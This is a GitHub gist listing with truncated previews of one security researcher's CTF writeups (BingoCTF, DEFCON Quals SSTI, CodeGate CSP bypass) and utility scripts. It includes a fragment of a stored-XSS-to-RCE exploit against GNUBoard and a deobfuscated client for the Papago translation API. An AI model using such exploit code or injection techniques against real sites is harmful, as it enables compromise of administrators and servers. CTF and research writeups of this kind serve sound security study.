Skip to content

Instantly share code, notes, and snippets.

stypr /
Last active Apr 19, 2021
BingoCTF 2020: Web - Guestbook [Hard]

web: guestbook writeup

Checking configs/worker


Docker-compose is build in a way that

  1. private has flag in /flag
  2. redis / worker are used. this is only used for admin to check the challenge.
stypr /
Last active Apr 19, 2021
BingoCTF 2020: Web - simpleboard [Medium]

web: simpleboard writeup

Let's check the main page's source code by view-source (view-source:

As wee see in the following, server loads an image from a website.

        <h3 class="text-center text-white pt-5"><img src="/?image=6c6f676f.png"></h3>

Let's take a look at the function in init.php that loads the image.

stypr /
Last active Apr 19, 2021
BingoCTF 2020: Web - Temporary [Easy]

web: temporary writeup

There are two instances namely public and internal. We can get the address of public by leaking $_SERVER['REMOTE_ADDR"] in phpinfo.php?phpinfo

stypr /
Last active Jun 15, 2020
DEFCON Quals Web exploit (Participated as r3kapig)


  1. Write one comment
  2. When writing a comment content, do SSTI to leak author's credentials
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/'), '__file__': './app/', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': 
stypr /
Created Mar 17, 2020
Unzip with different encoding
#Nothing on stackoverflow works!
import zipfile
import sys
zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
_file.filename = bytes(_file.filename).decode('cp949')
stypr / exploit.html
Last active Feb 6, 2021
GNUBoard RCE ~2019.1
View exploit.html
Stored XSS (2019.01.02)
<form action="" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//'; // RCE from admin
stypr / papago-api.php
Last active Dec 30, 2020
Deobfuscated Papago API (Python/Javascript/PHP) : Blocked as of December 2020
View papago-api.php
// Ported from
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
function uuidgen() {
return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
mt_rand(0, 0xffffffff),
mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)
stypr /
Last active Feb 9, 2020
CodeGate 2019 CSP challenge writeup


  1. if(md5($salt.$api_string) !== $sig){ can be bypassed with hash length extension attack (didn't do it, but the key length is 12.)

  2. Use custom header and body to trigger CSP bypass.

stypr /
Last active Sep 18, 2019
2019 Cyber Operations Challenge Finals Pistol Exploit

Quick Summary

First-blooded this challenge. The server is down, I cannot explain briefly

  1. Comment in the website shows get_perm.php

  2. Another comment in the get_perm.php shows ?remote_debug=1.

  3. Using a php trick, you get a write post privilege.

stypr /
Created Aug 16, 2019
Install MobSF Framework on CentOS 7 (with Headless Dynamic Analysis)
# Maintainer: Harold Kim (
# Tested in CentOS 7.6.1810
# $ lsb_release -a
# LSB Version: :core-4.1-amd64:core-4.1-noarch
# Distributor ID: CentOS
# Description: CentOS Linux release 7.6.1810 (Core)
# Release: 7.6.1810
# Codename: Core